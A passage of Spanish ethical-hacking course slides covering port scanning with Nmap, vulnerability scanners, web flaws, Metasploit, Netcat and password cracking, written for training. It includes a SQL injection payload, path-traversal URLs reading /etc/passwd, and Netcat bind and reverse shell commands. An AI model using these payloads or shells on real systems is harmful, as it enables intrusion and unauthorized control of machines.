protocolo TCP. El escaneo consiste en enviar un paquete UDP vaco al puerto
objetivo. El sistema responder con un paquete ICMP tipo 3, si el puerto est
cerrado, en caso de no responder el puerto puede estar o abierto o filtrado.

2.3. Enumeracin de los Servicios

La etapa de enumeracin de servicios consta de reconocer el programa


demonio (daemon) que gestiona el servicio trabajando en el puerto
especfico, una vez reconocido un puerto como abierto.

9
Divisin de Alta Tecnologa
Ethical Hacking

2.3. Enumeracin de los Servicios

Banner Grabbing se le denomina a la tcnica que consiste en establecer


una conexin hacia un servicio y visualizar la informacin que el
demonio brinda sobre s mismo (el banner).

2.3. Enumeracin de los Servicios

10
Divisin de Alta Tecnologa
Ethical Hacking

2.3. Enumeracin de los Servicios

Contenido de Agenda

Introduccin
Escaneo y Enumeracin
Nmap

11
Divisin de Alta Tecnologa
Ethical Hacking

3.1. Definicin

Network mapper es un software libre escaneador de puertos por


excelencia. Originalmente, fue programado por Gordon Lyon (Fyodor)
en septiembre de 1997. Actualmente es utilizado para evaluar la
seguridad de los sistemas informticos, as como, para descubrir
servicios y servidores en una red informtica.

3.2. Tipos de Escaneo

12
Divisin de Alta Tecnologa
Ethical Hacking

3.3. Otros Comandos

a) -PN: no intenta enviar un ping al equipo escaneado.


b) -V: obtiene informacin adicional.
c) --Reason: muestra la razn porque el puerto fue tomado como abierto,
cerrado o filtrado.
d) -P: Nmap por defecto escanea .los 1000 puertos ms conocidos
e) -sC: permite utilizar, programar y compartir los scripts utilizando el
lenguaje de programacin LUA.
f) -sV: reconoce si un puerto est abierto, interrogue al puerto para
realizar una deteccin del servicio.
g) -O: analiza respuestas para determinar el SO.

3.3. Otros Comandos

a) paranoid (0)
Evasin IDS, serializado, 5 minutos de gap
b) sneaky (1)
15 segundos de gap
c) polite (2)
0.4 segundos de gap
d) normal (3)
verificaciones en paralelo
e) aggressive (4)
10 milisegundos de gap
f) insane (5)
5 milisegundos de gap

13
Divisin de Alta Tecnologa
Ethical Hacking

Laboratorio n 5

Ejercicio:
Tiempo: 90 minutos
Desarrolle el siguiente laboratorio e intercambie los resultados entre sus
compaeros, lo que le permitir obtener valiosas conclusiones.

14
Divisin de Alta Tecnologa
Ethical Hacking

6.0 Anlisis de las Vulnerabilidades

Contenido de Agenda

Introduccin
Analizadores a Nivel Plataforma
Analizadores a Nivel Aplicacin

1
Divisin de Alta Tecnologa
Ethical Hacking

1.1. Anlisis de Vulnerabilidades

a) El escaneo de puertos da como resultado, qu puertos se tienen para la


escucha y adems, qu servicios estn corriendo (incluye las versiones)
b) El AV permite identificar muchos de los principales agujeros de
seguridad que ponen en riesgo los sistemas de una red.
c) El AV es parte de la etapa de scanning y es el paso anterior antes de
iniciar el ataque propiamente dicho.

1.2. Anlisis Automatizado

Este tipo de anlisis se basa en el uso de herramientas que,


generalmente con una interfaz simple y amigable, permiten
identificar vulnerabilidades en los equipos presentes en una red.

2
Divisin de Alta Tecnologa
Ethical Hacking

1.3. Anlisis Manual

Es el proceso por el cual, se ejecutan diversas pruebas sobre


un objetivo buscando descubrir, mediante procedimientos
manuales, la presencia de vulnerabilidades de seguridad.

1.4. Nivel Plataforma

El anlisis de vulnerabilidades a nivel de plataforma consiste en


la bsqueda, evaluacin y comprobacin de vulnerabilidades a
nivel del sistema operativo que ejecuta el objetivo y los
servicios de red que se ofrecen.

3
Divisin de Alta Tecnologa
Ethical Hacking

1.5. Nivel Aplicacin

El anlisis a nivel aplicacin consiste en la bsqueda de


vulnerabilidades directamente sobre las aplicaciones que
corren en una determinada plataforma.

Contenido de Agenda

Introduccin
Analizadores a Nivel Plataforma
Analizadores a Nivel Aplicacin

4
Divisin de Alta Tecnologa
Ethical Hacking

2.1. Software Nessus

a) Potente escaner de vulnerabilidades,


desarrollado por la empresa Teenable
Security de libre descarga.
b) Con Nessus se pueden exportar
informes, donde se encuentran enlaces a
Internet que explican el tipo de
vulnerabilidad encontrada.
Cmo es explotada?
Cmo se soluciona?

2.2. Software NeXpose

a) NeXpose es una herramienta creada por


Rapid7 que se ofrece como una solucin
en el proceso de identificacin de
vulnerabilidades y generacin de
reportes detallados.
b) La base de datos de vulnerabilidades
evaluadas por NeXpose incluye sistemas
operativos, bases de datos y
aplicaciones.

5
Divisin de Alta Tecnologa
Ethical Hacking

Contenido de Agenda

Introduccin
Analizadores a Nivel Plataforma
Analizadores a Nivel Aplicacin

3.1. Software Nikto

a) Se utiliza para encontrar archivos Web por defecto, y


examinar la seguridad de un servidor Web, as como,
sus aplicaciones CGI.
b) El programa busca automticamente los fallos y muestra
un listado categorizndolos de esta manera:
Problemas de configuracin.
Archivos y scripts por defecto.
Archivos y scripts inseguros.
Software desactualizado.

6
Divisin de Alta Tecnologa
Ethical Hacking

3.2. Software Paros

a) Paros es una herramienta libre programada en Java


utilizada para la evaluacin de vulnerabilidades de
aplicaciones Web
b) Consiste en un proxy que permite capturar las peticiones
tanto HTTP como HTTPS para simplemente registrarlas o
modificarlas.

3.3. Tamper Data

a) Tamper Data es una extensin para el navegador Mozilla


Firefox, que puede ser descargada desde
https://addons.mozilla.org/en-US/firefox/addon/966/
b) Permite interceptar el trfico HTTP entre el browser y el sitio
web y as, descubrir brechas de seguridad en aplicaciones
Web.
c) Se pueden inspeccionar y modificar las cabeceras HTTP
como las variables enviadas.

7
Divisin de Alta Tecnologa
Ethical Hacking

Laboratorio n 6

Ejercicio:
Tiempo: 60 minutos
Desarrolle el siguiente laboratorio e intercambie los resultados entre sus
compaeros, lo que le permitir obtener valiosas conclusiones.

8
Divisin de Alta Tecnologa
Ethical Hacking

7.0 Inseguridades en Aplicaciones Web

Contenido de Agenda

Introduccin
Vulnerabilidades Web
Frameworks de Aprendizaje

1
Divisin de Alta Tecnologa
Ethical Hacking

1.1. Definicin y Conceptos

a) Cuando se habla de la seguridad en


aplicaciones Web normalmente, no se
habla de las vulnerabilidades de los
sistemas operativos o servidores Web.
b) A menudo, se habla de las
vulnerabilidades del propio software y/o
aplicaciones desarrolladas por la empresa
o por un tercero.
c) La seguridad en las aplicaciones Web se
encuentran ligadas, exclusivamente, con la
lgica, cdigo fuente y contenido de una
aplicacin.

1.1. Definicin y Conceptos

d) Las vulnerabilidades que afectan a las aplicaciones Web


pueden ser explotadas en distintas plataformas, en contraste
de lo que ocurre con otros tipos de vulnerabilidades
dependientes de la plataforma donde estos se ejecutan o
corren.

2
Divisin de Alta Tecnologa
Ethical Hacking

Contenido de Agenda

Introduccin
Vulnerabilidades Web
Frameworks de Aprendizaje

2.1. Antecedentes

a) Para proteger exitosamente una aplicacin Web es necesario conocer los


tipos de ataques existentes y la vulnerabilidad que stos explotan para
entender sus posibles variaciones.
b) SecurityFocus, organizacin dedicada a la seguridad informtica,
analiz 30,000 incidentes de seguridad en aplicaciones Web ocurridos
durante el 2007.
c) Se determin que los ataques hacia aplicaciones Web ms utilizados
aprovechan las vulnerabilidades de las seguridad publicadas y/o
conocidas.

3
Divisin de Alta Tecnologa
Ethical Hacking

2.1. Antecedentes

d) Hoy no se registran nuevos tipos de vulnerabilidades tan


slo variaciones de las conocidas. Normalmente, los ataques
se realizan en la capa de aplicacin por los puertos (80 y
443)
e) Esto es confirmado por organizaciones internacionales
comprometidas con la seguridad Web:
- OWASP www.owasp.org
- WebAppSec www.webappsec.org

2.1. Antecedentes

http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

4
Divisin de Alta Tecnologa
Ethical Hacking

2.2. Tipos de Ataque

Inyeccin SQL

Este ataque es utilizado por intrusos para


comprometer aplicaciones que construyen
sentencias SQL utilizando los datos
suministrados por el usuario y es posible,
debido a falta de validacin y saneamiento
de los parmetros suministrados por el usuario.

2.2. Tipos de Ataque

Inyeccin SQL

SELECT * FROM Tusuario WHERE user='admin' AND passw='123456'

SELECT * FROM Tusuario WHERE user='admin' AND passw=' ' OR 1=1

5
Divisin de Alta Tecnologa
Ethical Hacking

2.2. Tipos de Ataque

Cross Site Scripting (XSS)

XSS ocurre cuando portales web de contenido dinmico muestran variables


de entrada suplidas por el usuario sin una propia validacin. Esta
vulnerabilidad permite a un atacante la inyeccin de cdigo que ser
ejecutado por el navegador Web de la persona que visualiza la pgina, (la
vctima)

http://www.xssed.org/

2.2. Tipos de Ataque

Manipulacin del Path

La manipulacin de path (Path Trasversal) afecta a aplicaciones


que toman entrada de los usuarios y la utilizan en un path
para acceder al sistema de archivos. Si el atacante ingresa
caracteres especiales que modifican el path la aplicacin,
podr permitir el acceso no autorizado a recursos del sistema.

6
Divisin de Alta Tecnologa
Ethical Hacking

2.2. Tipos de Ataque

Manipulacin del Path


www.sitio.com/imprimir.php?file=archivo1.txt
www.sitio.com/imprimir.php?file=../../etc/passwd
www.sitio.com/imprimir.php?file=../../scripts/db.inc

2.2. Tipos de Ataque

Remote File Inclusion

Tcnica que permite el enlace de archivos remotos situados en


otros servidores a causa de una mala programacin. Los lenguajes
de programacin de lado servidor, permiten la inclusin de cdigo
desde una ubicacin externa, tanto local como remota.

7
Divisin de Alta Tecnologa
Ethical Hacking

Contenido de Agenda

Introduccin
Vulnerabilidades Web
Frameworks de Aprendizaje

3.1. WebGoat

Aplicacin Web, deliberadamente, creada para ser insegura basada en J2EE y


desarrollada por OWASP.

Actualmente existen ms de 30 lecciones que incluyen vulnerabilidades como


XSS, Control de Accesos, SQL Injection, Cookies dbiles y Manipulacin de Parmetros.

8
Divisin de Alta Tecnologa
Ethical Hacking

3.2. Damn Vulnerable Wep Application

Es una aplicacin (PHP/MySQL) de entrenamiento en seguridad Web que se destaca


por ser de liviano peso.

Permite entrenamiento en seguridad Web en SQL Injection, XSS (Cross Site Scripting), LFI
(Local File Inclusion), RFI (Remote File Inclusion), Command Execution, Upload Script y Login
Brute Force.

Laboratorio n 7

Ejercicio:
Tiempo: 60 minutos
Desarrolle el siguiente laboratorio e intercambie los resultados entre sus
compaeros, lo que le permitir obtener valiosas conclusiones.

9
oidiiddhufhahfofhjfhajos
Divisin de Alta Tecnologa
Ethical Hacking

8.0 Explotacin de las Vulnerabilidades

Contenido de Agenda

Trabajando con Exploits


Metasploit
La Navaja Suiza del Hacker
Password Cracking

1
Divisin de Alta Tecnologa
Ethical Hacking

1.1. Introduccin

a) Luego de realizar el anlisis de las vulnerabilidades se tiene


conocimiento exacto de los principales agujeros de seguridad TI de la
empresa.
b) A continuacin, es necesario informarse sobre todas las vulnerabilidades
para comprenderlas, saber a qu sistemas afectan, bajo qu condiciones
stas pueden ser explotadas y si existe un exploit pblico.
c) Revisar el cdigo fuente para verificar que no es falso y confirmar las
plataformas en que operan. Durante el proceso de Ethical Hacking puede
modificarse aunque por temas de tiempos no es comn.

1.2. Securityfocus.com

2
Divisin de Alta Tecnologa
Ethical Hacking

1.3. Exploit-db.com

1.4. Packetstormsecurity.org

3
Divisin de Alta Tecnologa
Ethical Hacking

1.5. Compilando Exploits

extensin: .pl
Extensin: .c, .cc perl exploit.pl parmetros
gcc exploit.c -o binario
./binario parmetros
Extensin: .php
php exploit.php parmetros

Extensin: .py
python exploit.py parmetros
Extensin: .rb
ruby exploit.rb parmetros

Contenido de Agenda

Trabajando con Exploits


Metasploit
La Navaja Suiza del Hacker
Password Cracking

4
Divisin de Alta Tecnologa
Ethical Hacking

2.1. Introduccin

Es una herramienta integral de software libre para el


desarrollo y ejecucin de exploits contra equipos remotos. Es
conocido y respetado por liberar algunos de los exploits
ms sofisticados, a tan slo unas horas de haber sido
liberada una vulnerabilidad pblicamente.

2.2. Forma de Instalacin

a) apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby


b) apt-get install subversion libreadline-ruby irb ri rubygems
c) tar xf framework-3.X.tar.gz
d) sudo mkdir -p /opt/metasploit3
e) sudo cp -a msf3/ /opt/metasploit3/msf3
f) sudo chown root:root -R /opt/metasploit3/msf3
g) sudo ln -sf /opt/metasploit3/msf3/msf* /usr/local/bin/
h) svn update /opt/metasploit3/msf3/

5
Divisin de Alta Tecnologa
Ethical Hacking

2.3. Formas de Utilizacin

Metasploit permite interactuar con su funcionalidad, a


travs de dos interfaces: mediante la consola llamada
msfconsole y de una interfaz Web de nombre msfweb.

2.4. Metasploit Framework

Al margen de la interfaz, el procedimiento para explotar una


vulnerabilidad son los mismos:

a) Elegir el exploit a utilizar


b) Configurar el exploit
c) Elegir el Payload
d) Ejecutar el exploit

6
Divisin de Alta Tecnologa
Ethical Hacking

Contenido de Agenda

Trabajando con Exploits


Metasploit
La Navaja Suiza del Hacker
Password Cracking

3.1. Introduccin

Netcat es una herramienta que permite, a travs de la lnea


de comandos, leer y escribir informacin en sockets a
travs de la red de datos utilizando el protocolo de
comunicacin TCP/IP.

7
Divisin de Alta Tecnologa
Ethical Hacking

3.2. Funcionalidades de la Herramienta

a) Conectarse y abrir un puertos TCP/UDP


b) Asociar un shell a un puerto (para realizar una administracin
remota de un terminal)
c) Transferencias de archivos
d) Abrir puertas traseras (backdoors)
e) Crear canales encubiertos

3.3. Parmetros Bsicos

8
Divisin de Alta Tecnologa
Ethical Hacking

3.4. Transfiriendo Archivos

Netcat puede ser utilizado para transferir archivos de una


computadora a otra, a travs de la red. Esto se aplica para
archivos de texto y binarios.
a) Mquina A: nc -lvp 4444 > salida.txt
b) Mquina B: nc -vv 192.168.1.1 444 < test.txt

3.5. Shell Directo (Puerta Trasera)

Mquina A:
a) Windows: nc -lvvp 4444 -e cmd.exe
b) Linux: nc -lvvp 444 -e /bin/bash

Mquina B:
a) nc -v 192.168.1.1 4444

9
Divisin de Alta Tecnologa
Ethical Hacking

3.6. Shell Reversa (Firewall Bypass)

Mquina B:
a) nc -lvvp 4444

Mquina A:
a) Windows: nc -v 192.168.1.1
4444 -e cmd.exe
b) Linux: nc -v 192.168.1.1 4444 -
e /bin/bash

Contenido de Agenda

Trabajando con Exploits


Metasploit
La Navaja Suiza del Hacker
Password Cracking

10
Divisin de Alta Tecnologa
Ethical Hacking

4.1. Introduccin

Password Cracking es el proceso informtico por el cual, se


intenta conseguir credenciales vlidas de una aplicacin y
puede ser utilizado para recuperar credenciales perdidas,
evaluar la robustez de las credenciales o conseguir acceso
no autorizado.

4.2. Tcnicas de Password Cracking

Password
Ataque
Guessing Password Sniffing
Hbrido

Ataque por Fuerza Bruta


Diccionario

11
Divisin de Alta Tecnologa
Ethical Hacking

4.3. Herramientas

THC Hydra Medusa

Cain &
Abel

Laboratorio n 8

Ejercicio:
Tiempo: 60 minutos
Desarrolle el siguiente laboratorio e intercambie los resultados entre sus
compaeros, lo que le permitir obtener valiosas conclusiones.

12

También podría gustarte